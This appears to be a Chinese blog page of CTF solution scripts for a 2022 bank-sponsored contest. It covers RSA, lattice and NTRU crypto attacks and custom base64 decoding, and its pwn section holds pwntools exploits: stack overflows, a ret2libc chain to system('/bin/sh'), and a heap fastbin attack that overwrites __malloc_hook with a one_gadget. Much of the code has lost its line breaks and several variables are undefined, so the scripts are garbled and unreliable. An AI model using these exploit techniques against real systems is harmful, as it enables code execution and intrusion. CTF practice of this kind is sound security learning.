
crypto 1 手抖的小明


# coding:utf-8
# python 3.6#from flag import flag
#import res = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"#assert re.match(r'^DASCTF\{[a-f0-9]+\}$',flag) != None
flag = "DASCTF{"
def encode(inputs):bin_str = []for i in inputs:x = str(bin(ord(i))).replace('0b', '')bin_str.append('{:0>8}'.format(x))outputs = ""nums = 0while bin_str:temp_list = bin_str[:3]if (len(temp_list) != 3):nums = 3 - len(temp_list)while len(temp_list) < 3:temp_list += ['0' * 8]temp_str = "".join(temp_list)temp_str_list = []for i in range(0, 4):temp_str_list.append(int(temp_str[i * 6:(i + 1) * 6], 2))if nums:temp_str_list = temp_str_list[0:4 - nums]for i in temp_str_list:outputs += s[i]bin_str = bin_str[3:]outputs += nums * '='return outputs#c = encode(flag)
s = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"
h = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
c = '+Se++h+mFYVPJv+zb+SYK+V4dvKRKQSXJ+uzJ++zJ+uRK3JXK+bYG+'
#    +Se++h+mFYVPJv+zb+SYK+V4dvKRKQSXJ+uzJ++zJ+uRK3JXK+bYG+==
m = ''
for i in c:print(s.index(i))p = s.index(i)m+=h[p]
print(m)#m = "fQ==" #from base64 import *
import string ss = b'0123456789abcdef-_{}'
#ss = string.printable.encode()
def aaa(idx, mm):#print(mm, idx)if idx>=4:#print(idx, mm)try:t = b64decode(mm)except:return #print(t)for v in t:if v not in ss:breakelse:print("xxx ",t)return if mm[idx] == 'Q':for v in "QRSTU":if idx == 0:aaa(idx+1, v+mm[1:])elif idx==3:aaa(idx+1, mm[0:3]+v)else:aaa(idx+1, mm[0:idx]+v+mm[idx+1:])else:aaa(idx+1, mm)m = 'QEFQQ1QGezc4YWQhMQEzZQcwOWZkZjEyYQVhYQQhYQVkZDYyZQMzfQ=='
m = m[8:]  #GASCTFfor v in range(0, len(m), 4):print('---------',v,m[v: v+4])aaa(0, m[v: v+4])#DASCTF{78ada113e709fdf12a5aa4aa5dd62e33}  

crypto 3 RSA


d1 = 0x7d12e57b1aa157038ebe5c45b56256270671e6984b0dcdf10a2ea07ce480143240c9a3e1c60870e499306a717073f157476aa88e99a7bdf1e2a4adf8ce21025cc6c05035c4a1d7e3b6f061464872e65118384999f0154f3c1761fa68d4685126b7fc98f4c2cdc41c98aa4e099a868a89099dd2170664647efca2c8d8e06a2e49
e1 = 0x10001
n1 = 0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77
c1 = 0x6c435db37217bc4da3f225a8f1a0501e03a97d2cbc4fa249df051ed66c1559b68885f4fa181bdd9e98242441f463dbbc1c26d1eea2c5774a0a905b366c8775bce8e52182dc32a93647c9b8842b74abc434e5b84eeae679a3b19cb7a1ef6ae8f65d22ce6ab438a16119805eee83408a68207bbdfde5181a8bd8b4794c711d33c4
c2=0x8cb5d8861e5838f41910d6eaf142a8d47b92e0c6b1b1e9e25896f7169644bbb726ccfdc82ba50932fbc45f00c53dda42f8efc358a5108cde8aaa9f38b493aa3417c9522924f06847ba4a3dd26f005a610f7633877fbe89e090df5cb3a7a5ebae0fbe72eabb339b21fa2ddd33844a5cb53e39491fc472721ed676ae07b33c8d6efrom gmpy2 import *
import random
from Crypto.Util.number import long_to_bytesdef getpq(n,e,d):while True:k = e * d - 1g = random.randint(0, n)while k%2==0:k=k//2temp=powmod(g,k,n)-1if gcd(temp,n)>1 and temp!=0:return gcd(temp,n)print(getpq(n1,e1,d1))
p = 7989817345872802916258824633068986429227729563110196898659568255235293257271203068952971618219681106634429039565231866429796385557747877260629666332312643
q = 13264897405419718100411551025228233248810511685104073408647554593159408298020238756835088759200259612491893289998541138751171701279712972233358298687021757print(p)
phi = (p-1)*(q-1)
d2 = invert(e2, phi)
m2 = pow(c2, d2, n2)
#b'flag part two is :ca5c600783b9bde0'
m1 = pow(c1, d1, n1)
print(long_to_bytes(m1))  # flag part one is :2295b774c4467c9a

crypto 4 RSA


# -*- coding: utf-8 -*-
# @Time : 2020/10/31 23:37
# @Author : A.James
# @FileName: tt6.py
# @Email : alexjames@sina.com
import time############################################
# Config
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
debug = True"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
strict = False"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
helpful_only = True
dimension_min = 7  # stop removing if lattice reaches that dimension############################################
# Functions
########################################### display stats on helpful vectors
def helpful_vectors(BB, modulus):nothelpful = 0for ii in range(BB.dimensions()[0]):if BB[ii, ii] >= modulus:nothelpful += 1print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")# display matrix picture with 0 and X
def matrix_overview(BB, bound):for ii in range(BB.dimensions()[0]):a = ('%02d ' % ii)for jj in range(BB.dimensions()[1]):a += '0' if BB[ii, jj] == 0 else 'X'if BB.dimensions()[0] < 60:a += ' 'if BB[ii, ii] >= bound:a += '~'print(a)# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):# end of our recursive functionif current == -1 or BB.dimensions()[0] <= dimension_min:return BB# we start by checking from the endfor ii in range(current, -1, -1):# if it is unhelpful:if BB[ii, ii] >= bound:affected_vectors = 0affected_vector_index = 0# let's check if it affects other vectorsfor jj in range(ii + 1, BB.dimensions()[0]):# if another vector is affected:# we increase the countif BB[jj, ii] != 0:affected_vectors += 1affected_vector_index = jj# level:0# if no other vectors end up affected# we remove itif affected_vectors == 0:print( "* removing unhelpful vector", ii)BB = BB.delete_columns([ii])BB = BB.delete_rows([ii])monomials.pop(ii)BB = remove_unhelpful(BB, monomials, bound, ii - 1)return BB# level:1# if just one was affected we check# if it is affecting someone elseelif affected_vectors == 1:affected_deeper = Truefor kk in range(affected_vector_index + 1, BB.dimensions()[0]):# if it is affecting even one vector# we give up on this oneif BB[kk, affected_vector_index] != 0:affected_deeper = False# remove both it if no other vector was affected and# this helpful vector is not helpful enough# compared to our unhelpful oneif affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(bound - BB[ii, ii]):print( "* removing unhelpful vectors", ii, "and", affected_vector_index)BB = BB.delete_columns([affected_vector_index, ii])BB = BB.delete_rows([affected_vector_index, ii])monomials.pop(affected_vector_index)monomials.pop(ii)BB = remove_unhelpful(BB, monomials, bound, ii - 1)return BB# nothing happenedreturn BB"""
* 0,0   if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""def boneh_durfee(pol, modulus, mm, tt, XX, YY):"""Boneh and Durfee revisited by Herrmann and Mayfinds a solution if:* d < N^delta* |x| < e^delta* |y| < e^0.5whenever delta < 1 - sqrt(2)/2 ~ 0.292"""# substitution (Herrman and May)PR.< u, x, y > = PolynomialRing(ZZ)Q = PR.quotient(x * y + 1 - u)  # u = xy + 1polZ = Q(pol).lift()UU = XX * YY + 1# x-shiftsgg = []for kk in range(mm + 1):for ii in range(mm - kk + 1):xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kkgg.append(xshift)gg.sort()# x-shifts list of monomialsmonomials = []for polynomial in gg:for monomial in polynomial.monomials():if monomial not in monomials:monomials.append(monomial)monomials.sort()# y-shifts (selected by Herrman and May)for jj in range(1, tt + 1):for kk in range(floor(mm / tt) * jj, mm + 1):yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)yshift = Q(yshift).lift()gg.append(yshift)  # substitution# y-shifts list of monomialsfor jj in range(1, tt + 1):for kk in range(floor(mm / tt) * jj, mm + 1):monomials.append(u ^ kk * y ^ jj)# construct lattice Bnn = len(monomials)BB = Matrix(ZZ, nn)for ii in range(nn):BB[ii, 0] = gg[ii](0, 0, 0)for jj in range(1, ii + 1):if monomials[jj] in gg[ii].monomials():BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)# Prototype to reduce the latticeif helpful_only:# automatically removeBB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)# reset dimensionnn = BB.dimensions()[0]if nn == 0:print( "failure")return 0, 0# check if vectors are helpfulif debug:helpful_vectors(BB, modulus ^ mm)# check if determinant is correctly boundeddet = BB.det()bound = modulus ^ (mm * nn)if det >= bound:print( "We do not have det < bound. Solutions might not be found.")print( "Try with highers m and t.")if debug:diff = (log(det) - log(bound)) / log(2)print( "size det(L) - size e^(m*n) = ", floor(diff))if strict:return -1, -1else:print( "det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")# display the lattice basisif debug:matrix_overview(BB, modulus ^ mm)# LLLif debug:print( "optimizing basis of the lattice via LLL, this can take a long time")BB = BB.LLL()if debug:print( "LLL is done!")# transform vector i & j -> polynomials 1 & 2if debug:print( "looking for independent vectors in the lattice")found_polynomials = Falsefor pol1_idx in range(nn - 1):for pol2_idx in range(pol1_idx + 1, nn):# for i and j, create the two polynomialsPR.<w,z> = PolynomialRing(ZZ)pol1 = pol2 = 0for jj in range(nn):pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)# resultantPR.<q> = PolynomialRing(ZZ)rr = pol1.resultant(pol2)# are these good polynomials?if rr.is_zero() or rr.monomials() == [1]:continueelse:print( "found them, using vectors", pol1_idx, "and", pol2_idx)found_polynomials = Truebreakif found_polynomials:breakif not found_polynomials:print( "no independant vectors could be found. This should very rarely happen...")return 0, 0rr = rr(q, q)# solutionssoly = rr.roots()if len(soly) == 0:print( "Your prediction (delta) is too small")return 0, 0soly = soly[0][0]ss = pol1(q, soly)solx = ss.roots()[0][0]#return solx, solydef example():############################################# How To Use This Script############################################ The problem to solve (edit the following values)## the modulusN=0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7# the public exponente=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501 * 1376213 * 11932523# the cipherc=0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623b# the hypothesis on the private exponent (the theoretical maximum is 0.292)delta = .18  # this means that d < N^delta## Lattice (tweak those values)## you should tweak this (after a first run), (e.g. increment it until a solution is found)m = 4  # size of the lattice (bigger the better/slower)# you need to be a lattice master to tweak theset = int((1 - 2 * delta) * m)  # optimization from Herrmann and MayX = 2 * floor(N ^ delta)  # this _might_ be too muchY = floor(N ^ (1 / 2))  # correct if p, q are ~ same size## Don't touch anything below## Problem put in equationP.<x,y> = PolynomialRing(ZZ)A = int((N + 1) / 2)pol = 1 + x * (A + y)## Find the solutions!## Checking boundsif debug:print( "=== checking values ===")print( "* delta:", delta)print( "* delta < 0.292", delta < 0.292)print( "* size of e:", int(log(e) / log(2)))print( "* size of N:", int(log(N) / log(2)))print( "* m:", m, ", t:", t)# boneh_durfeeif debug:print( "=== running algorithm ===" )start_time = time.time()solx, soly = boneh_durfee(pol, e, m, t, X, Y)# found a solution?if solx > 0:print( "=== solution found ===")if False:print( "x:", solx)print( "y:", soly)d = int(pol(solx, soly) / e)m = pow(c, d, N)print( '[-]d is ' + str(d))print( '[-]m is: ' + str(m))print( '[-]hex(m) is: ' + '{:x}'.format(int(m)))else:print( "[!]no solution was found!")print( '[!]All Done!')if debug:print("[!]Timer: %s s" % (time.time() - start_time))print( '[!]All Done!')example()
# 666c6167206973203a3738636335366261343435306136393766643632356363393164646634343332
#>>> bytes.fromhex('666c6167206973203a3738636335366261343435306136393766643632356363393164646634343332')
#b'flag is :78cc56ba4450a697fd625cc91ddf4432'

crypto 5 标准的NTRU


#! /bin/bash/env python3from random import randrange
from Crypto.Util.number import *
from gmpy2 import invert
def gcd(a,b):while b:a,b = b,a%breturn adef generate():p = getPrime(1024)while True:f = randrange(1,(p//2)**(0.5))g = randrange((p//4)**(0.5),(p//2)**(0.5))if gcd(f,p)==1 and gcd(f,g)==1:breakh = (invert(f,p)*g)%preturn h,p,f,g
# h = g/f mod p def encrypt(m,h,p):assert m<(p//4)**(0.5)r = randrange(1,(p//2)**(0.5))c = (r*h+m)%preturn ch,p,f,g = generate()from flag import flag
c = encrypt(bytes_to_long(flag),h,p)
print("h = {}".format(h))
print("p = {}".format(p))
print("c = {}".format(c))
h = 70851272226599856513658616506718804769182611213413854493145253337330709939355936692154199813179587933065165812259913249917314725765898812249062834111179900151466610356207921771928832591335738750053453046857602342378475278876652263044722419918958361163645152112020971804267503129035439011008349349624213734004
p = 125796773654949906956757901514929172896506715196511121353157781851652093811702246079116208920427110231653664239838444378725001877052652056537732732266407477191221775698956008368755461680533430353707546171814962217736494341129233572423073286387554056407408816555382448824610216634458550949715062229816683685469
c = 4691517945653877981376957637565364382959972087952249273292897076221178958350355396910942555879426136128610896883898318646711419768716904972164508407035668258209226498292327845169861395205212789741065517685193351416871631112431257858097798333893494180621728198734264288028849543413123321402664789239712408700# Construct lattice.
v1 = vector(ZZ, [1, h])
v2 = vector(ZZ, [0, p])
m = matrix([v1,v2]);# Solve SVP.
shortest_vector = m.LLL()[0]
# shortest_vector = GaussLatticeReduction(v1, v2)[0]
f, g = shortest_vector
print(f, g)
f = -f
g = -g# Decrypt.
a = f*c % p % g
m1 = a * inverse_mod(f, g) % g

pwn 1 magicc


from pwn import *#p = process('./magicc')
p = remote('', 62039)elf = ELF('./magicc')
context(arch='amd64', log_level='debug')p.sendlineafter(b"4.-->Slytherin\n", b'4')
p.sendafter(b'You are one step short of success\n', b'A'*22+p32(0x80485a7))

pwn 2 ddstack


from pwn import *#p = process('./ddstack')
p = remote('', 62083)elf = ELF('./ddstack')
#libc_elf = ELF('/usr/lib/i386-linux-gnu/libc-2.31.so')
libc_elf = ELF('./libc-2.23.so')
context(arch='i386', log_level='debug')p.sendafter(b"Your Input :", b'A'*40+p32(100))
p.sendafter(b"Try Again ?\n", b'A'*40+flat(100, 1, 0,0, elf.plt['puts'], 0x80483e0, elf.got['puts'])) #
data = p.recvline()
libc_base = u32(data[:4]) - libc_elf.sym['puts']
libc_elf.address = libc_base
bin_sh = next(libc_elf.search(b'/bin/sh'))
print('libc:', hex(libc_base))p.sendafter(b"Your Input :", b'A'*40+p32(100))
p.sendafter(b"Try Again ?", b'A'*40+flat(100, 1, 0,0, libc_elf.sym['system'], 0x80483e0, bin_sh))p.interactive()#b'flag{8cd753ca3beb65735f6438b73068b6e5}'

pwn 3 pwn14


from pwn import *#p = process('./pwn14')
#libc_elf = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')p = remote('', 62125)
libc_elf = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')elf = ELF('./pwn14')
#libc_elf = ELF('./libc-2.23.so')
context(arch='amd64', log_level='debug')p.sendafter(b"input the message :", b'A'*0x40)p.recvuntil(b"your message :")
p.recv(0x40)  #local 0x38
pwn_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0xb70 #0x840
elf.address = pwn_base
pop_rdi = 0x0000000000000bd3 + pwn_base
print('pwn:', hex(pwn_base))p.sendafter(b"input the new message size(hexadecimal):", b'-ffffff00')
p.sendafter(b"input new content:",  b'A'*0x40+flat(0, pop_rdi, elf.got['read'], elf.plt['puts'], elf.sym['_start'])) #p.recvline()
data = p.recvline()[:-1]
libc_base = u64(data.ljust(8, b'\x00')) - 0xf7350 #libc_elf.sym['read']
libc_elf.address = libc_base
bin_sh = libc_base + 0x18ce57 #next(libc_elf.search(b'/bin/sh'))
system = libc_base + 0x453a0 #libc_elf.sym['system']
print('libc:', hex(libc_base))#2
p.sendafter(b"input the message :", b'A'*0x40)
p.sendafter(b"input the new message size(hexadecimal):", b'-ffff0000')
p.sendafter(b"input new content:",  b'A'*0x40+flat(0, pop_rdi+1, pop_rdi, bin_sh, system)) #p.interactive()

pwn 4 free_free_free


先弄个unsort然后用残留改到指向_IO_2_1_stdout_ (错位。爆破半字节)然后再弄FastbinAttack把指针指到这,覆盖stdout_的头得到输出,得到libc。然后再向malloc_hook写one_gadget

from pwn import *def connect(local=1):  if local == 1:p = process('./pwn')else:p = remote('node4.buuoj.cn', 28546)  return plibc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830elf = ELF('./pwn')
context.arch = 'amd64'
#context.log_level = 'debug'menu = b'> '
def add(size, msg):p.sendlineafter(menu, b'1')p.sendlineafter(b"size> " , str(size).encode())  #no \np.sendafter(b"message> ", msg)def free(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"idx> " , str(idx))  # no \n after change _IO_2_1_stdout_def pwn():global pp = connect(1)add(0x28, b'A'*8+ p64(0x31))add(0x28, b'A')add(0x68, b'A') #2add(0x68, b'A')add(0x68, b'A') #4add(0x68, b'A') #5add(0x68, b'A')add(0x18, b'A')free(0)free(1)free(0)add(0x28, b'\x10') #6add(0x28, b'a')add(0x28, b'a')add(0x28, p64(0)*3 + p64(0xa1)) #9#gdb.attach(p)#pause()free(1)add(0x28, b'A')   #0x71 = libc-stdout#lp = int(input("libc:x000:"), 16)*16 lp = 8*16   add(0x68, p8(0xdd)+p8(lp+5)) #11 = 2free(4)free(3)free(4)add(0x68, b'\x60')add(0x68, b'A')add(0x68, b'A')add(0x68, b'A')context.log_level = 'debug'add(0x68, b'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0) ) libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3c5600 one_gadget = libc_base + one[3]libc_elf.address = libc_baseprint('libc:', hex(libc_base))free(5)free(6)free(5)add(0x68, p64(libc_elf.sym['__malloc_hook'] -0x23))add(0x68, b'A')add(0x68, b'A')add(0x68, b'\x00'*(0x13) + p64(one_gadget) )p.sendlineafter(menu, b'1')p.sendlineafter(b"size> " , b'1')p.sendline(b'cat /flag')p.interactive()while True:try:pwn()except:p.close()pass


[河北银行 2022 CTF]相关推荐

  1. 2022 *CTF REVERSE的Simple File System

    2022 *CTF REVERSE的Simple File System . . 下载附件,有四个文件: . . 照例扔入虚拟机中运行一下,查看主要回显信息: . . 照例扔入 IDA64 中查看伪代 ...

  2. 2022 *CTF REVERSE 的 NaCl

    2022 *CTF REVERSE 的 NaCl 下载附件: . . 照例扔入 exeinfope 中查看信息: . . 照例扔入虚拟机中运行一下,查看主要回显信息: . . 照例扔入 IDA64 中 ...

  3. Hack The Boo 2022 CTF题目writeups

    一个入门级的ctf比赛,网站链接: https://ctf.hackthebox.com/event/details/hack-the-boo-637 Forensics 1.Halloween_In ...

  4. 易观千帆 | 2022年11月银行APP月活跃用户规模盘点

    易观分析:11月手机银行服务应用活跃人数52639.05万,环比增长0.68%:排在前三的手机银行APP仍然为中国工商银行.中国农业银行.中国建设银行. 11月城商行手机银行服务应用活跃人数3730. ...

  5. 2022年中国数据库排行榜年终盘点-墨天轮

    深山虎啸雄风在,绿野兔奔好景来. 崭新的2023年已经到来,在2022年里,国产数据库行业发生了翻天覆地的变化,投融资此起彼伏,国产化替代进程加速,国产数据库行业发展的如火如荼.墨天轮12期中国数据库 ...

  6. 易观千帆 | 2023年1月银行APP月活跃用户规模盘点

    易观千帆:2023年1月手机银行服务应用活跃人数51786.02万,环比增长0.19%,同比增长6.41%. 2023年1月信用卡服务应用活跃人数10410.24万,环比下降4.77%.主要受到季节性 ...

  7. 2022年11月国产数据库大事记-墨天轮

    本文为墨天轮社区整理的2022年11月国产数据库大事件和重要产品发布消息. 文章目录 11月国产数据库大事记(时间线) 产品/版本发布 兼容认证 排行榜新增数据库 11月国产数据库大事记(时间线) 1 ...

  8. 2022Q4手机银行运营亮点:“新版本迭代潮”叠加“个人养老金账户争夺战”

    易观:由中国电子银行网.易观联合发布的"2022中国手机银行综合运营报告"显示:从总体趋势上看,2022年最后一个季度,中国银行业手机银行运营指数呈现逐月回落趋势.对此,易观分析认 ...

  9. 易观千帆 | Q1运营报告:手机银行MAU超5.3亿,行业“内卷”超出想象

    易观:由中国电子银行网.易观分析联合发布的"2023中国手机银行综合运营报告"显示:在经济企稳回升的大背景下,中国手机银行第一季度综合运营指数季度内呈平稳上升态势,手机银行活跃人数 ...


  1. Golang微服务开发实践
  2. 牛津大学计算机系主任:人工智能立法重在抓机遇、防危害
  3. 杰森·保罗:使VR与人眼相匹配还需20年!
  4. 算法训练 连续正整数的和 (枚举)
  5. OpenResty 概要及原理科普
  6. 编译php,ldap问题
  7. linux修改hostname
  8. linux退出python环境_Linux中的python虚拟环境
  9. Android 爆高危漏洞,华为小米皆中招;第三代苹果 AirPods 来了;SQLite 3.30.0 发布 | 极客头条...
  10. 【C/C++】使用PDFLIB创建一个带中文的pdf文件
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  12. 阿里云国际站云服务器可以用来做什么业务?
  13. 《程序是怎么跑起来的》第一章学习笔记
  14. aspose实现word,excel在线预览
  15. 原创 METTLER TOLEDO托利多Bplus 条码格式设置教程(scale manager)
  16. Python3断网离线安装依赖包
  17. C# 远程唤醒(远程开机)
  18. 湿度传感器行业调研报告 - 市场现状分析与发展前景预测
  19. 从0开始的技术美术之路(十六)延迟渲染
  20. 2021年熔化焊接与热切割复审考试及熔化焊接与热切割模拟考试题库


  1. 公司如何选择适合的管理软件?
  2. 剪映321倒计时特效怎么弄?
  3. C语言中log函数怎么使用啊
  4. 51单片机——基于单片机的智能报警系统设计
  5. ARM处理器体系结构总结
  6. jquery iframe跳转
  7. 隐隐约约看到了月全食
  8. CentOS7硬盘扩容
  9. unity机器学习入门栗子之3D平衡球
  10. VC++编程实现网络嗅探器